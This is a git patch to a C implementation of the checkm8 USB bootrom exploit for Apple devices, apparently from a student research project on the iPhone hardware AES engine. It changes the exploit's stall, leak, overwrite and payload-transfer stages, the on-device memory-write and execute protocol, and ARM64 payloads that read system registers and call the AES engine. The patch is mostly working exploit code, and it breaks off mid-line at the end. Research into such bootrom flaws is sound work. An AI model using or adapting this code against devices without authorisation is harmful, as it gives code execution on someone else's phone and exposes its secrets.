From cc87e78cb2ebc9c8ffd4e8750982f0313004669a Mon Sep 17 00:00:00 2001 From: Gregor Haas Date: Sat, 14 Dec 2019 20:06:56 -0500 Subject: [PATCH] Some execution fixes --- checkm8_payloads/CMakeLists.txt | 7 +- checkm8_payloads/include/util.h | 7 ++ checkm8_payloads/src/aes.c | 5 +- checkm8_payloads/src/sync.c | 10 ++ checkm8_payloads/src/sysreg.c | 5 +- checkm8_payloads/test.c | 5 - checkm8_remote/include/command.h | 6 +- checkm8_remote/include/payload.h | 3 +- checkm8_remote/main.c | 18 +++- checkm8_remote/src/command.c | 162 +++++++++++++--------------- checkm8_remote/src/exploit.c | 30 +++--- checkm8_remote/src/libusb_helpers.c | 47 ++++---- checkm8_remote/src/payload.c | 29 +++-- include/checkm8_config.h | 5 +- 14 files changed, 189 insertions(+), 150 deletions(-) create mode 100644 checkm8_payloads/include/util.h create mode 100644 checkm8_payloads/src/sync.c delete mode 100644 checkm8_payloads/test.c diff --git a/checkm8_payloads/CMakeLists.txt b/checkm8_payloads/CMakeLists.txt index 23bd44e..a943c7e 100644 --- a/checkm8_payloads/CMakeLists.txt +++ b/checkm8_payloads/CMakeLists.txt @@ -7,11 +7,14 @@ set(CMAKE_ASM_COMPILER /usr/bin/aarch64-linux-gnu-as) set(CMAKE_OBJCOPY /usr/bin/aarch64-linux-gnu-objcopy) set(CMAKE_C_FLAGS "-nostdlib -O") -set(PAYLOADS payload_aes payload_sysreg) +set(PAYLOADS payload_sync payload_aes payload_sysreg) +add_executable(payload_sync src/sync.c) add_executable(payload_aes src/aes.c) add_executable(payload_sysreg src/sysreg.c) -file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin) +file(MAKE_DIRECTORY ${CMAKE_CURRENT_SOURCE_DIR}/bin/) +set_directory_properties(PROPERTY ADDITIONAL_CLEAN_FILES "${CMAKE_CURRENT_SOURCE_DIR}/bin/") + foreach(BINARY ${PAYLOADS}) add_custom_command(TARGET ${BINARY} POST_BUILD BYPRODUCTS ${CMAKE_CURRENT_SOURCE_DIR}/bin/${BINARY}.bin diff --git a/checkm8_payloads/include/util.h b/checkm8_payloads/include/util.h new file mode 100644 index 0000000..69048a3 --- /dev/null +++ b/checkm8_payloads/include/util.h @@ -0,0 +1,7 @@ +#ifndef IPWNDFU_REWRITE_C_UTIL_H +#define IPWNDFU_REWRITE_C_UTIL_H + +#define PAYLOAD_SECTION __attribute__ ((section (".payload_text"))) +#define TEXT_SECTION __attribute__((section (".text"))) + +#endif //IPWNDFU_REWRITE_C_UTIL_H diff --git a/checkm8_payloads/src/aes.c b/checkm8_payloads/src/aes.c index 0f7e011..3926e92 100644 --- a/checkm8_payloads/src/aes.c +++ b/checkm8_payloads/src/aes.c @@ -2,7 +2,9 @@ #include "brfunc_timing.h" #include "brfunc_sep.h" -__attribute__ ((section (".payload_text"))) +#include "util.h" + +PAYLOAD_SECTION int aes_hw_crypto_command(unsigned int cmd, void *src, void *dst, @@ -45,6 +47,7 @@ int aes_hw_crypto_command(unsigned int cmd, return 0; } +TEXT_SECTION int _start(unsigned int cmd, void *src, void *dst, diff --git a/checkm8_payloads/src/sync.c b/checkm8_payloads/src/sync.c new file mode 100644 index 0000000..25140bf --- /dev/null +++ b/checkm8_payloads/src/sync.c @@ -0,0 +1,10 @@ +#include "util.h" + +TEXT_SECTION +void _start() +{ + __asm__("dmb sy"); + __asm__("ic iallu"); + __asm__("dsb sy"); + __asm__("isb"); +} \ No newline at end of file diff --git a/checkm8_payloads/src/sysreg.c b/checkm8_payloads/src/sysreg.c index 887be9d..f375fb5 100644 --- a/checkm8_payloads/src/sysreg.c +++ b/checkm8_payloads/src/sysreg.c @@ -1,13 +1,16 @@ +#include "util.h" + struct sysregs { long pt_base; long evt_base; }; +TEXT_SECTION struct sysregs _start() { struct sysregs res; - __asm__("mrs %0, ttbr1_el1" : "=r" (res.pt_base)); + __asm__("mrs %0, ttbr0_el1" : "=r" (res.pt_base)); __asm__("mrs %0, vbar_el1" : "=r" (res.evt_base)); return res; diff --git a/checkm8_payloads/test.c b/checkm8_payloads/test.c deleted file mode 100644 index a454691..0000000 --- a/checkm8_payloads/test.c +++ /dev/null @@ -1,5 +0,0 @@ - -int _start(int b) -{ - return b * 5; -} \ No newline at end of file diff --git a/checkm8_remote/include/command.h b/checkm8_remote/include/command.h index 36f69bf..809b6bc 100644 --- a/checkm8_remote/include/command.h +++ b/checkm8_remote/include/command.h @@ -3,9 +3,9 @@ #include "checkm8.h" -int dev_memset(struct pwned_device *dev, long addr, unsigned char c, long len); -int dev_memcpy(struct pwned_device *dev, long dest, long src, long len); -int dev_exec(struct pwned_device *dev, long response_len, int nargs, unsigned long long *args); +int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len); +int dev_memcpy(struct pwned_device *dev, long dest, long src, int len); +int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args); int dev_read_memory(struct pwned_device *dev, long addr, long len); int dev_write_memory(); diff --git a/checkm8_remote/include/payload.h b/checkm8_remote/include/payload.h index 67ce4a4..f659a4e 100644 --- a/checkm8_remote/include/payload.h +++ b/checkm8_remote/include/payload.h @@ -5,9 +5,10 @@ #define PAYLOAD_AES_BIN CHECKM8_BIN_BASE "payloads/payload_aes.bin" #define PAYLOAD_SYSREG_BIN CHECKM8_BIN_BASE "payloads/payload_sysreg.bin" - +#define PAYLOAD_SYNC_BIN CHECKM8_BIN_BASE "payloads/payload_sync.bin" typedef enum { + PAYLOAD_SYNC, PAYLOAD_AES, PAYLOAD_SYSREG } PAYLOAD_T; diff --git a/checkm8_remote/main.c b/checkm8_remote/main.c index dc646a2..71a3363 100644 --- a/checkm8_remote/main.c +++ b/checkm8_remote/main.c @@ -5,7 +5,7 @@ #include #include -void checkm8_debug(const char *format, ...) +void checkm8_debug_indent(const char *format, ...) { #ifdef CHECKM8_LOGGING void *traces[100]; @@ -14,7 +14,6 @@ void checkm8_debug(const char *format, ...) { printf("\t"); } - va_list args; va_start (args, format); @@ -23,6 +22,18 @@ void checkm8_debug(const char *format, ...) #endif } +void checkm8_debug_block(const char *format, ...) +{ +#ifdef CHECKM8_LOGGING + va_list args; + + va_start (args, format); + vprintf(format, args); + va_end(args); +#endif +} + + int main() { struct pwned_device *dev = exploit_device(); @@ -32,6 +43,9 @@ int main() return -1; } + install_payload(dev, PAYLOAD_SYNC, DRAM); install_payload(dev, PAYLOAD_SYSREG, DRAM); + + execute_payload(dev, PAYLOAD_SYNC, 0); execute_payload(dev, PAYLOAD_SYSREG, 0); } \ No newline at end of file diff --git a/checkm8_remote/src/command.c b/checkm8_remote/src/command.c index 7f94ec1..f1145ca 100644 --- a/checkm8_remote/src/command.c +++ b/checkm8_remote/src/command.c @@ -8,7 +8,7 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len) { - checkm8_debug("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len); + checkm8_debug_indent("dfu_send_data(dev = %p, data = %p, data_len = %li)\n", dev, data, data_len); long index = 0, amount; int ret; @@ -17,39 +17,26 @@ int dfu_send_data(struct pwned_device *dev, unsigned char *data, long data_len) if(data_len - index >= LIBUSB_MAX_PACKET_SIZE) amount = LIBUSB_MAX_PACKET_SIZE; else amount = data_len - index; - checkm8_debug("\tsending chunk of size %li at index %li\n", amount, index); + checkm8_debug_indent("\tsending chunk of size %li at index %li\n", amount, index); ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, &data[index], amount, 5000); - if(ret > 0) checkm8_debug("\ttransferred %i bytes\n", ret); + if(ret > 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); else { - checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } index += amount; } } -struct command_args -{ - unsigned long long magic; - unsigned long long pad; - - unsigned long long arg1; - unsigned long long arg2; - unsigned long long arg3; - unsigned long long arg4; - unsigned long long arg5; - unsigned long long arg6; - unsigned long long arg7; - - long len; -}; - static unsigned char nullbuf[16] = {0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}; -int command(struct pwned_device *dev, struct command_args *args, struct command_args *resp, long response_len) +int command(struct pwned_device *dev, + unsigned char *args, int arg_len, + unsigned char *resp, int response_len) { - checkm8_debug("command(dev = %p, args = %p, resp = %p, response_len = %li)\n", dev, args, resp, response_len); + checkm8_debug_indent("command(dev = %p, args = %p, arg_len = %i resp = %p, response_len = %i)\n", + dev, args, arg_len, resp, response_len); if(!is_device_bundle_open(dev)) return CHECKM8_FAIL_NODEV; int ret; @@ -57,54 +44,59 @@ int command(struct pwned_device *dev, struct command_args *args, struct command_ if(IS_CHECKM8_FAIL(ret)) return ret; ret = libusb_control_transfer(dev->bundle->handle, 0x21, 1, 0, 0, nullbuf, 0, 100); - if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret); + if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); else { - checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); - if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret); + if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); else { - checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 3, 0, 0, nullbuf, 6, 100); - if(ret >= 0) checkm8_debug("\ttransferred %i bytes\n", ret); + if(ret >= 0) checkm8_debug_indent("\ttransferred %i bytes\n", ret); else { - checkm8_debug("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\trequest failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } - ret = dfu_send_data(dev, (unsigned char *) args, args->len); + ret = dfu_send_data(dev, args, arg_len); if(IS_CHECKM8_FAIL(ret)) return ret; if(response_len == 0) { - ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len + 1, 100); - if(ret >= 0) checkm8_debug("\tfinal request transferred %i bytes\n", ret); + ret = libusb_control_transfer(dev->bundle->handle, + 0xA1, 2, 0xFFFF, 0, + resp, response_len + 1, + 100); + if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); else { - checkm8_debug("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } } else { - ret = libusb_control_transfer(dev->bundle->handle, 0xA1, 2, 0xFFFF, 0, (unsigned char *) resp, response_len, 100); - if(ret >= 0) checkm8_debug("\tfinal request transferred %i bytes\n", ret); + ret = libusb_control_transfer(dev->bundle->handle, + 0xA1, 2, 0xFFFF, 0, + resp, response_len, + 100); + if(ret >= 0) checkm8_debug_indent("\tfinal request transferred %i bytes\n", ret); else { - checkm8_debug("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); + checkm8_debug_indent("\tfinal request failed with error code %i (%s)\n", ret, libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } } - checkm8_debug("\tgot response magic %lx (%s)\n", resp->magic, (char *) &resp->magic); return CHECKM8_SUCCESS; } @@ -113,80 +105,72 @@ int command(struct pwned_device *dev, struct command_args *args, struct command_ #define MEMS_MAGIC 0x6d656d736d656d73ul // 'memsmems'[::-1] #define DONE_MAGIC 0x646f6e65646f6e65ul // 'donedone'[::-1] -int dev_memset(struct pwned_device *dev, long addr, unsigned char c, long len) +int dev_memset(struct pwned_device *dev, long addr, unsigned char c, int len) { - checkm8_debug("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len); - int ret; - struct command_args *cmd_args, *cmd_resp; - cmd_args = calloc(1, sizeof(struct command_args)); - cmd_resp = calloc(1, sizeof(struct command_args)); + checkm8_debug_indent("dev_memset(dev = %p, addr = %lx, c = %x, len = %li)\n", dev, addr, c, len); + unsigned long long cmd_args[5]; + cmd_args[0] = MEMS_MAGIC; + cmd_args[1] = 0; + cmd_args[2] = addr; + cmd_args[3] = (unsigned long long) c; + cmd_args[4] = len; - checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp); - cmd_args->magic = MEMS_MAGIC; - cmd_args->pad = 0; - cmd_args->arg1 = addr; - cmd_args->arg2 = (unsigned long) c; - cmd_args->arg3 = len; - cmd_args->len = 40; - - ret = command(dev, cmd_args, cmd_resp, 8); - free(cmd_args); - free(cmd_resp); - - return ret; + unsigned long long cmd_resp; + return command(dev, + (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), + (unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long)); } -int dev_memcpy(struct pwned_device *dev, long dest, long src, long len) +int dev_memcpy(struct pwned_device *dev, long dest, long src, int len) { - checkm8_debug("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len); - int ret; - struct command_args *cmd_args, *cmd_resp; - cmd_args = calloc(1, sizeof(struct command_args)); - cmd_resp = calloc(1, sizeof(struct command_args)); + checkm8_debug_indent("dev_memset(dev = %p, dest = %lx, src = %lx, len = %li)\n", dev, dest, src, len); + unsigned long long cmd_args[5]; + cmd_args[0] = MEMC_MAGIC; + cmd_args[1] = 0; + cmd_args[2] = dest; + cmd_args[3] = src; + cmd_args[4] = len; - checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp); - cmd_args->magic = MEMC_MAGIC; - cmd_args->pad = 0; - cmd_args->arg1 = dest; - cmd_args->arg2 = src; - cmd_args->arg3 = len; - cmd_args->len = 40; - - ret = command(dev, cmd_args, cmd_resp, 0); - free(cmd_args); - free(cmd_resp); - - return ret; + unsigned long long cmd_resp; + return command(dev, + (unsigned char *) &cmd_args, 5 * sizeof(unsigned long long), + (unsigned char *) &cmd_resp, 1 * sizeof(unsigned long long)); } -int dev_exec(struct pwned_device *dev, long response_len, int nargs, unsigned long long *args) +int dev_exec(struct pwned_device *dev, int response_len, int nargs, unsigned long long *args) { - checkm8_debug("dev_exec(dev = %p, response_len = %l, nargs = %i, args = %p\n", dev, response_len, nargs, args); + checkm8_debug_indent("dev_exec(dev = %p, response_len = %lu, nargs = %i, args = %p\n", dev, response_len, nargs, + args); if(nargs > 7) { - checkm8_debug("\ttoo many args\n"); + checkm8_debug_indent("\ttoo many args\n"); return CHECKM8_FAIL_INVARGS; } int ret, i; unsigned long long *argbase; - struct command_args *cmd_args, *cmd_resp; - cmd_args = calloc(1, sizeof(struct command_args)); - cmd_resp = calloc(1, sizeof(struct command_args)); + checkm8_debug_indent("\tcopying args\n"); - checkm8_debug("\tcmd_args = %p, cmd_resp = %p\n", cmd_args, cmd_resp); - checkm8_debug("\tcopying args"); + unsigned long long cmd_args[1 + nargs]; + unsigned long long cmd_resp[1 + response_len]; - cmd_args->magic = EXEC_MAGIC; - cmd_args->pad = 0; - argbase = &cmd_args->arg1; + cmd_args[0] = EXEC_MAGIC; + cmd_args[1] = 0; + argbase = (unsigned long long *) ((unsigned char *) &cmd_args[1] + 0); for(i = 0; i < nargs; i++) { argbase[i] = args[i]; - checkm8_debug("\t\t%ul\n", args[i]); + checkm8_debug_indent("\t\t0x%lx (0d%li) (%s)\n", args[i], args[i], (char *) &args[i]); } - ret = command(dev, cmd_args, cmd_resp, 16 + response_len); - if(ret == CHECKM8_SUCCESS && cmd_resp->magic != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE; - else return ret; + ret = command(dev, + (unsigned char *) cmd_args, (1 + nargs) * sizeof(unsigned long long), + (unsigned char *) cmd_resp, 16 + 8 * response_len); + + if(ret == CHECKM8_SUCCESS && ((unsigned long *) cmd_resp)[0] != DONE_MAGIC) return CHECKM8_FAIL_NOTDONE; + else + { + checkm8_debug_indent("\tgot retval %lX\n", cmd_resp[1]); + return ret; + } } \ No newline at end of file diff --git a/checkm8_remote/src/exploit.c b/checkm8_remote/src/exploit.c index 535930e..e692273 100644 --- a/checkm8_remote/src/exploit.c +++ b/checkm8_remote/src/exploit.c @@ -12,20 +12,20 @@ typedef int(stage_function)(struct pwned_device *dev); int complete_stage(struct pwned_device *device, stage_function *func) { - checkm8_debug("complete_stage(dev = %p, func = %p)\n", device, func); + checkm8_debug_indent("complete_stage(dev = %p, func = %p)\n", device, func); int ret; ret = get_device_bundle(device); if(ret == LIBUSB_ERROR_NO_DEVICE) { - checkm8_debug("\tfailed to get device bundle\n"); + checkm8_debug_indent("\tfailed to get device bundle\n"); return CHECKM8_FAIL_NODEV; } - checkm8_debug("\tgot device bundle, calling function\n"); + checkm8_debug_indent("\tgot device bundle, calling function\n"); ret = func(device); - checkm8_debug("\treleasing device bundle\n"); + checkm8_debug_indent("\treleasing device bundle\n"); release_device_bundle(device); return ret; @@ -33,7 +33,7 @@ int complete_stage(struct pwned_device *device, stage_function *func) int stage1_function(struct pwned_device *dev) { - checkm8_debug("exploit stage 1\n"); + checkm8_debug_indent("exploit stage 1\n"); unsigned int i; stall(dev); @@ -44,28 +44,28 @@ int stage1_function(struct pwned_device *dev) usb_req_leak(dev); no_leak(dev); - checkm8_debug("\treset\n"); + checkm8_debug_indent("\treset\n"); libusb_reset_device(dev->bundle->handle); return CHECKM8_SUCCESS; } int stage2_function(struct pwned_device *dev) { - checkm8_debug("exploit stage 2\n"); + checkm8_debug_indent("exploit stage 2\n"); unsigned char databuf[0x800]; memset(databuf, 'A', 0x800); libusb1_async_ctrl_transfer(dev, 0x21, 1, 0, 0, databuf, 0x800, 1); libusb1_no_error_ctrl_transfer(dev, 0x21, 4, 0, 0, NULL, 0, 0); - checkm8_debug("\treset\n"); + checkm8_debug_indent("\treset\n"); libusb_reset_device(dev->bundle->handle); return CHECKM8_SUCCESS; } int stage3_function(struct pwned_device *dev) { - checkm8_debug("exploit stage 3\n"); + checkm8_debug_indent("exploit stage 3\n"); unsigned char overwrite_buf[1524]; FILE *overwrite_file = fopen(CHECKM8_BIN_BASE "overwrite.bin", "r"); fread(overwrite_buf, 1524, 1, overwrite_file); @@ -79,28 +79,28 @@ int stage3_function(struct pwned_device *dev) usb_req_stall(dev); usb_req_leak(dev); - checkm8_debug("\ttransferring overwrite\n"); + checkm8_debug_indent("\ttransferring overwrite\n"); libusb1_no_error_ctrl_transfer(dev, 0, 0, 0, 0, overwrite_buf, 1524, 100); - checkm8_debug("\ttransferring payload\n"); + checkm8_debug_indent("\ttransferring payload\n"); libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, payload_buf, 2048, 100); libusb1_no_error_ctrl_transfer(dev, 0x21, 1, 0, 0, &payload_buf[2048], 352, 100); - checkm8_debug("reset\n"); + checkm8_debug_indent("reset\n"); libusb_reset_device(dev->bundle->handle); return CHECKM8_SUCCESS; } int check_function(struct pwned_device *dev) { - checkm8_debug("checking device serial\n"); + checkm8_debug_indent("checking device serial\n"); unsigned char serial_buf[128]; unsigned int i; struct libusb_device_handle *handle = dev->bundle->handle; struct libusb_device_descriptor *desc = dev->bundle->descriptor; libusb_get_string_descriptor_ascii(handle, desc->iSerialNumber, serial_buf, sizeof(serial_buf)); - checkm8_debug("\tgot serial %s\n", serial_buf); + checkm8_debug_indent("\tgot serial %s\n", serial_buf); for(i = 0; i < 13; i++) { @@ -121,7 +121,7 @@ struct pwned_device *exploit_device() res->idVendor = DEV_IDVENDOR; res->idProduct = DEV_IDPRODUCT; - checkm8_debug("exploit_device() -> dev = %p\n", res); + checkm8_debug_indent("exploit_device() -> dev = %p\n", res); int ret = complete_stage(res, check_function); if(ret == CHECKM8_SUCCESS) diff --git a/checkm8_remote/src/libusb_helpers.c b/checkm8_remote/src/libusb_helpers.c index 36243a9..76e4b77 100644 --- a/checkm8_remote/src/libusb_helpers.c +++ b/checkm8_remote/src/libusb_helpers.c @@ -9,10 +9,10 @@ int get_device_bundle(struct pwned_device *dev) { - checkm8_debug("get_device_bundle(dev = %p)\n", dev); + checkm8_debug_indent("get_device_bundle(dev = %p)\n", dev); if(dev->bundle->ctx == NULL) { - checkm8_debug("\tbundle ctx is NULL, allocating\n"); + checkm8_debug_indent("\tbundle ctx is NULL, allocating\n"); dev->bundle->ctx = malloc(sizeof(libusb_context)); libusb_init(&dev->bundle->ctx); } @@ -22,7 +22,7 @@ int get_device_bundle(struct pwned_device *dev) dev->bundle->descriptor->idVendor == dev->idVendor && dev->bundle->descriptor->idProduct == dev->idProduct) { - checkm8_debug("\tbundle is already valid\n"); + checkm8_debug_indent("\tbundle is already valid\n"); return LIBUSB_SUCCESS; } } @@ -31,7 +31,7 @@ int get_device_bundle(struct pwned_device *dev) int usb_dev_count, ret = LIBUSB_ERROR_NO_DEVICE; usb_dev_count = libusb_get_device_list(dev->bundle->ctx, &usb_device_list); - checkm8_debug("\tfound %i USB devices\n", usb_dev_count); + checkm8_debug_indent("\tfound %i USB devices\n", usb_dev_count); dev->bundle->device = NULL; dev->bundle->handle = NULL; @@ -45,24 +45,24 @@ int get_device_bundle(struct pwned_device *dev) if(dev->bundle->descriptor->idVendor == dev->idVendor && dev->bundle->descriptor->idProduct == dev->idProduct) { - checkm8_debug("\tchecking device %i ... match!\n", i); + checkm8_debug_indent("\tchecking device %i ... match!\n", i); ret = LIBUSB_SUCCESS; break; } - checkm8_debug("\tchecking device %i ... no match\n", i); + checkm8_debug_indent("\tchecking device %i ... no match\n", i); } libusb_free_device_list(usb_device_list, usb_dev_count); if(ret == LIBUSB_SUCCESS) { - checkm8_debug("\topening device and returning success\n"); + checkm8_debug_indent("\topening device and returning success\n"); libusb_open(dev->bundle->device, &dev->bundle->handle); libusb_set_auto_detach_kernel_driver(dev->bundle->handle, 1); } else { - checkm8_debug("\tcould not find a matching device\n"); + checkm8_debug_indent("\tcould not find a matching device\n"); libusb_exit(dev->bundle->ctx); free(dev->bundle->ctx); free(dev->bundle->descriptor); @@ -78,10 +78,10 @@ int get_device_bundle(struct pwned_device *dev) int release_device_bundle(struct pwned_device *dev) { - checkm8_debug("release_device_bundle(dev = %p)\n", dev); + checkm8_debug_indent("release_device_bundle(dev = %p)\n", dev); if(dev->bundle->handle != NULL) { - checkm8_debug("\tclosing handle\n"); + checkm8_debug_indent("\tclosing handle\n"); libusb_close(dev->bundle->handle); dev->bundle->handle = NULL; } @@ -90,7 +90,7 @@ int release_device_bundle(struct pwned_device *dev) if(dev->bundle->ctx != NULL) { - checkm8_debug("\texiting context\n");; + checkm8_debug_indent("\texiting context\n");; libusb_exit(dev->bundle->ctx); free(dev->bundle->ctx); dev->bundle->ctx = NULL; @@ -98,7 +98,7 @@ int release_device_bundle(struct pwned_device *dev) if(dev->bundle->descriptor != NULL) { - checkm8_debug("\tfreeing device descriptor\n"); + checkm8_debug_indent("\tfreeing device descriptor\n"); free(dev->bundle->descriptor); dev->bundle->descriptor = NULL; } @@ -114,10 +114,10 @@ int is_device_bundle_open(struct pwned_device *dev) void LIBUSB_CALL async_ctrl_transfer_cb(struct libusb_transfer *transfer) { - checkm8_debug("transfer status: %s (%i / %i)\n", - libusb_error_name(transfer->status), - transfer->actual_length, - transfer->length); + checkm8_debug_indent("transfer status: %s (%i / %i)\n", + libusb_error_name(transfer->status), + transfer->actual_length, + transfer->length); } int libusb1_async_ctrl_transfer(struct pwned_device *dev, @@ -126,7 +126,8 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev, unsigned char *data, unsigned short data_len, unsigned int timeout) { - checkm8_debug("async_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", + checkm8_debug_indent( + "async_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); struct timeval start, end; unsigned char usb_transfer_buf[8 + data_len]; @@ -139,11 +140,11 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev, memcpy(&usb_transfer_buf[8], data, data_len); libusb_fill_control_transfer(usb_transfer, dev->bundle->handle, usb_transfer_buf, async_ctrl_transfer_cb, NULL, 1); - checkm8_debug("\tsubmiting urb\n"); + checkm8_debug_indent("\tsubmiting urb\n"); ret = libusb_submit_transfer(usb_transfer); if(ret != 0) { - checkm8_debug("\tfailed to submit async USB transfer: %s\n", libusb_error_name(ret)); + checkm8_debug_indent("\tfailed to submit async USB transfer: %s\n", libusb_error_name(ret)); libusb_free_transfer(usb_transfer); return CHECKM8_FAIL_XFER; } @@ -156,7 +157,7 @@ int libusb1_async_ctrl_transfer(struct pwned_device *dev, ret = libusb_cancel_transfer(usb_transfer); if(ret != 0) { - checkm8_debug("\tfailed to cancel async USB transfer: %s\n", libusb_error_name(ret)); + checkm8_debug_indent("\tfailed to cancel async USB transfer: %s\n", libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } @@ -171,7 +172,7 @@ int libusb1_no_error_ctrl_transfer(struct pwned_device *dev, unsigned char *data, unsigned short data_len, unsigned int timeout) { - checkm8_debug( + checkm8_debug_indent( "no_error_ctrl_transfer(dev = %p, bmRequestType = %i, bRequest = %i, wValue = %i, wIndex = %i, data = %p, data_len = %i, timeout = %i)\n", dev, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); int ret; @@ -183,14 +184,14 @@ int libusb1_no_error_ctrl_transfer(struct pwned_device *dev, ret = libusb_claim_interface(dev->bundle->handle, interface); if(ret > 0) { - checkm8_debug("\tfailed to claim interface: %s\n", libusb_error_name(ret)); + checkm8_debug_indent("\tfailed to claim interface: %s\n", libusb_error_name(ret)); return CHECKM8_FAIL_XFER; } } ret = libusb_control_transfer(dev->bundle->handle, bmRequestType, bRequest, wValue, wIndex, data, data_len, timeout); - checkm8_debug("\tgot error %s but ignoring\n", libusb_error_name(ret)); + checkm8_debug_indent("\tgot error %s but ignoring\n", libusb_error_name(ret)); return CHECKM8_SUCCESS; } diff --git a/checkm8_remote/src/payload.c b/checkm8_remote/src/payload.c index d735723..281a6ab 100644 --- a/checkm8_remote/src/payload.c +++ b/checkm8_remote/src/payload.c @@ -14,7 +14,7 @@ struct payload unsigned char *data; long len; - long install_base; + long long install_base; struct payload *next; struct payload *prev; }; @@ -27,6 +27,10 @@ struct payload *get_payload(PAYLOAD_T p) switch(p) { + case PAYLOAD_SYNC: + path = PAYLOAD_SYNC_BIN; + break; + case PAYLOAD_AES: path = PAYLOAD_AES_BIN; break; @@ -69,9 +73,12 @@ void free_payload(struct payload *p) free(p); } -long get_address(struct pwned_device *dev, LOCATION_T l) +long long curr_address = 0x180150000; +long long get_address(struct pwned_device *dev, LOCATION_T l) { - return 0x180151000; + long long ret = curr_address; + curr_address += 0x1000; + return ret; } @@ -122,9 +129,10 @@ int *dev_unlink_payload(struct pwned_device *dev, struct payload *pl) int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) { + checkm8_debug_indent("install_payload(dev = %p, p = %i, loc = %i)\n", dev, p, loc); int i, ret; struct payload *pl = get_payload(p); - long addr = get_address(dev, loc); + long long addr = get_address(dev, loc); if(pl == NULL || addr == -1) return CHECKM8_FAIL_INVARGS; @@ -133,6 +141,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) for(i = 0; i < pl->len; i++) { + checkm8_debug_indent("\tcopying payload byte %i of %i\n", i, pl->len); ret = dev_memset(dev, addr + i, pl->data[i], 1); if(IS_CHECKM8_FAIL(ret)) { @@ -141,6 +150,7 @@ int install_payload(struct pwned_device *dev, PAYLOAD_T p, LOCATION_T loc) } } + checkm8_debug_indent("\tdone copying and linking payload"); pl->install_base = addr; dev_link_payload(dev, pl); release_device_bundle(dev); @@ -154,25 +164,32 @@ int uninstall_payload(struct pwned_device *dev, PAYLOAD_T p) int execute_payload(struct pwned_device *dev, PAYLOAD_T p, int nargs, ...) { + checkm8_debug_indent("execute_payload(dev = %p, p = %i, nargs = %i, ...)\n", dev, p, nargs); int ret, i; struct payload *pl; - if((pl = dev_retrieve_payload(dev, p)) == NULL) return CHECKM8_FAIL_NOINST; + if((pl = dev_retrieve_payload(dev, p)) == NULL) + { + checkm8_debug_indent("\tpayload is not installed\n"); + return CHECKM8_FAIL_NOINST; + } ret = get_device_bundle(dev); if(IS_CHECKM8_FAIL(ret)) return ret; unsigned long long args[nargs + 1]; args[0] = pl->install_base; + checkm8_debug_indent("\tinstall base is 0x%lX\n", args[0]); va_list arg_list; va_start(arg_list, nargs); for(i = 0; i < nargs; i++) { args[i + 1] = va_arg(arg_list, unsigned long long); + checkm8_debug_indent("\textracted arg %li\n", args[i + 1]); } va_end(arg_list); - ret = dev_exec(dev, 16, nargs, args); + ret = dev_exec(dev, 2, nargs + 1, args); release_device_bundle(dev); return ret; } \ No newline at end of file diff --git a/include/checkm8_config.h b/include/checkm8_config.h index c76c2e6..0d2ad00 100644 --- a/include/checkm8_config.h +++ b/include/checkm8_config.h @@ -4,8 +4,9 @@ //#define LIBUSB_LOGGING #define CHECKM8_LOGGING #define CHECKM8_PLATFORM 8010 -#define CHECKM8_BIN_BASE "/home/grg/Projects/School/NCSU/iphone_aes_sc/checkm8_remote/bin/" +#define 